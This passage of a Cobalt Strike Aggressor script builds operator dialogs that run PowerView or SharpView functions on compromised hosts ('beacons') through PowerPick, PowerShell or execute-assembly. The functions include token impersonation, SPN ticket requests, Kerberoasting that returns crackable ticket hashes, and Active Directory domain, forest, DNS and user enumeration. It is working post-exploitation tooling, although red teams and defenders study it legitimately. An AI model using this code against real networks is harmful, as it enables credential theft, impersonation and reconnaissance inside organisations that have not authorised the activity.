        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Invoke-UserImpersonation via PowerPick');
            bpowerpick($bid, ''.$creds.'Invoke-UserImpersonation'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Invoke-UserImpersonation via PowerShell');
            bpowershell($bid, ''.$creds.'Invoke-UserImpersonation'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Invoke-UserImpersonation via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Invoke-UserImpersonation'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Creates a new 'runas /netonly' type logon and impersonates the token");
    drow_text($dialog, 'Credential', 'Credential');
    drow_text($dialog, 'TokenHandle', 'TokenHandle');
    drow_text($dialog, 'Quiet', 'Quiet');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub invokereverttoself{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Invoke-RevertToSelf", %(execmethod => "PowerPick", TokenHandle => ""), lambda({
        if ($2 eq  'Help'){
            helpinvokereverttoself()
            break;
        }
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Invoke-RevertToSelf via PowerPick');
            bpowerpick($bid, 'Invoke-RevertToSelf'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Invoke-RevertToSelf via PowerShell');
            bpowershell($bid, 'Invoke-RevertToSelf'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Invoke-RevertToSelf via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Invoke-RevertToSelf'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Reverts any token impersonation");
    drow_text($dialog, 'TokenHandle', 'TokenHandle');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainspnticket{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainSPNTicket", %(execmethod => "PowerPick", SPN => "", User => "", OutputFormat => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainspnticket()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainSPNTicket via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainSPNTicket'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainSPNTicket via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainSPNTicket'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainSPNTicket via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainSPNTicket'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Request the kerberos ticket for a specified service principal name (SPN)");
    drow_text($dialog, 'SPN', 'SPN');
    drow_text($dialog, 'User', 'User');
    drow_text($dialog, 'OutputFormat', 'OutputFormat');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub invokekerberoast{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Invoke-Kerberoast", %(execmethod => "PowerPick", Identity => "", Domain => "", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", OutputFormat => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpinvokekerberoast()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Invoke-Kerberoast via PowerPick');
            bpowerpick($bid, ''.$creds.'Invoke-Kerberoast'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Invoke-Kerberoast via PowerShell');
            bpowershell($bid, ''.$creds.'Invoke-Kerberoast'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Invoke-Kerberoast via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Invoke-Kerberoast'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getpathacl{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-PathAcl", %(execmethod => "PowerPick", Path => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetpathacl()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-PathAcl via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-PathAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-PathAcl via PowerShell');
            bpowershell($bid, ''.$creds.'Get-PathAcl'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-PathAcl via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-PathAcl'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates the ACL for a given file path");
    drow_text($dialog, 'Path', 'Path');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

#-----------------------
#Domain/LDAP Functions
#-----------------------
sub getdomaindnszone{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainDNSZone", %(execmethod => "PowerPick", Domain => "", Server => "", Properties => "", ResultPageSize => "", ServerTimeLimit => "", FineOne => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaindnszone()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainDNSZone via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainDNSZone'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainDNSZone via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainDNSZone'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainDNSZone via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainDNSZone'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates the Active Directory DNS zones for a given domain");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaindnsrecord{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainDNSRecord", %(execmethod => "PowerPick", ZoneName => "", Domain => "", Server => "", Properties => "", ResultPageSize => "", ServerTimeLimit => "", FindOne => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaindnsrecord()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainDNSRecord via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainDNSRecord'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainDNSRecord via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainDNSRecord'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainDNSRecord via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainDNSRecord'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Enumerates the Active Directory DNS records for a given zone");
    drow_text($dialog, 'ZoneName', 'ZoneName');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'FindOne', 'FindOne');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomain{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-Domain", %(execmethod => "PowerPick", Domain => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomain()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-Domain via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-Domain'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-Domain via PowerShell');
            bpowershell($bid, ''.$creds.'Get-Domain'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-Domain via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-Domain'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns the domain object for the current (or specified) domain");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomaincontroller{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainController", %(execmethod => "PowerPick", Domain => "", Server => "", LDAP => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomaincontroller()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainController via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainController'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainController via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainController'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainController via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainController'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return the domain controllers for the current (or specified) domain");
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'LDAP', 'LDAP');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getforest{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-Forest", %(execmethod => "PowerPick", Forest => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetforest()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-Forest via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-Forest'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-Forest via PowerShell');
            bpowershell($bid, ''.$creds.'Get-Forest'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-Forest via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-Forest'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Returns the forest object for the current (or specified) forest");
    drow_text($dialog, 'Forest', 'Forest');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getforestdomain{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-ForestDomain", %(execmethod => "PowerPick", Forest => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetforestdomain()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-ForestDomain via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-ForestDomain'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-ForestDomain via PowerShell');
            bpowershell($bid, ''.$creds.'Get-ForestDomain'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-ForestDomain via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-ForestDomain'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all domains for the current (or specified) forest");
    drow_text($dialog, 'Forest', 'Forest');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getforestglobalcatalog{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-ForestGlobalCatalog", %(execmethod => "PowerPick", Forest => "", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetforestglobalcatalog()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-ForestGlobalCatalog via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-ForestGlobalCatalog'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-ForestGlobalCatalog via PowerShell');
            bpowershell($bid, ''.$creds.'Get-ForestGlobalCatalog'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-ForestGlobalCatalog via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-ForestGlobalCatalog'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all global catalogs for the current (or specified) forest");
    drow_text($dialog, 'Forest', 'Forest');
    drow_text($dialog, 'Credential', 'Credential');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub finddomainobjectpropertyoutlier{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Find-DomainObjectPropertyOutlier", %(execmethod => "PowerPick", ClassName => "", ReferencePropertySet => "", ReferenceObject => "", Domain => "", LDAPFilter => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", Tombstone => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpfinddomainobjectpropertyoutlier()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Find-DomainObjectPropertyOutlier via PowerPick');
            bpowerpick($bid, ''.$creds.'Find-DomainObjectPropertyOutlier'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Find-DomainObjectPropertyOutlier via PowerShell');
            bpowershell($bid, ''.$creds.'Find-DomainObjectPropertyOutlier'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Find-DomainObjectPropertyOutlier via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Find-DomainObjectPropertyOutlier'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Finds user/group/computer objects in AD that have 'outlier' properties set");
    drow_text($dialog, 'ClassName', 'ClassName');
    drow_text($dialog, 'ReferencePropertySet', 'ReferencePropertySet');
    drow_text($dialog, 'ReferenceObject', 'ReferenceObject');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
    drow_text($dialog, 'Credential', 'Credential');
    drow_checkbox($dialog, 'Tombstone', 'Tombstone');
    drow_combobox($dialog, "execmethod", "Exec Method ", @("PowerPick", "PowerShell", "Execute-Assembly"));
    dbutton_action($dialog, "Run");
    dbutton_action($dialog, "Help");
    dialog_show($dialog);
}

sub getdomainuser{
    $bid = $1;
    $cmdargs = "";
    $dialog = dialog("PowerView 3.0 Get-DomainUser", %(execmethod => "PowerPick", Identity => "", SPN => "false", UACFilter => "", AdminCount => "false", AllowDelegation => "false", DisallowDelegation => "false", TrustedToAuth => "false",  PreauthNotRequired => "false", Domain => "", LDAPFilter => "", Properties => "", SearchBase => "", Server => "", SearchScope => "", ResultPageSize => "", ServerTimeLimit => "", SecurityMasks => "", Tombstone => "false", FineOne => "false", Credential => ""), lambda({
        if ($2 eq  'Help'){
            helpgetdomainuser()
            break;
        }
        $creds = "";
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod" && $key ne "Credential"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
            else if ($value eq "true"){
                $cmdargs .= ' -';
                $cmdargs .= $key;
            }
            else if ($key eq "Credential" && $value ne ""){
                $creds = createcredentialobject($bid, $3["execmethod"], $3["Credential"]);
                if($3["execmethod"] eq "Execute-Assembly"){
                    $value = $creds;
                }
                else if($3["execmethod"] eq "PowerPick" || $3["execmethod"] eq "PowerShell"){
                    $value = "\$Credential";
                }
                $cmdargs .= ' -';
                $cmdargs .= $key;
                $cmdargs .= ' ';
                $cmdargs .= $value;
            }
        }
        if($3["execmethod"] eq "PowerPick"){
            btask($bid, 'Executing PowerView Get-DomainUser via PowerPick');
            bpowerpick($bid, ''.$creds.'Get-DomainUser'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "PowerShell"){
            btask($bid, 'Executing PowerView Get-DomainUser via PowerShell');
            bpowershell($bid, ''.$creds.'Get-DomainUser'.$cmdargs.'');
        }
        else if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing SharpView Get-DomainUser via Execute-Assembly');
            bexecute_assembly($bid, script_resource($sharviewlocation), 'Get-DomainUser'.$cmdargs.'');
        }
    }));
    dialog_description($dialog, "Return all users or specific user objects in AD");
    drow_text($dialog, 'Identity', 'Identity');
    drow_text($dialog, 'UACFilter', 'UACFilter');
    drow_text($dialog, 'Domain', 'Domain');
    drow_text($dialog, 'LDAPFilter', 'LDAPFilter');
    drow_text($dialog, 'Properties', 'Properties');
    drow_text($dialog, 'SearchBase', 'SearchBase');
    drow_text($dialog, 'Server', 'Server');
    drow_text($dialog, 'SearchScope', 'SearchScope');
    drow_text($dialog, 'ResultPageSize', 'ResultPageSize');
    drow_text($dialog, 'ServerTimeLimit', 'ServerTimeLimit');
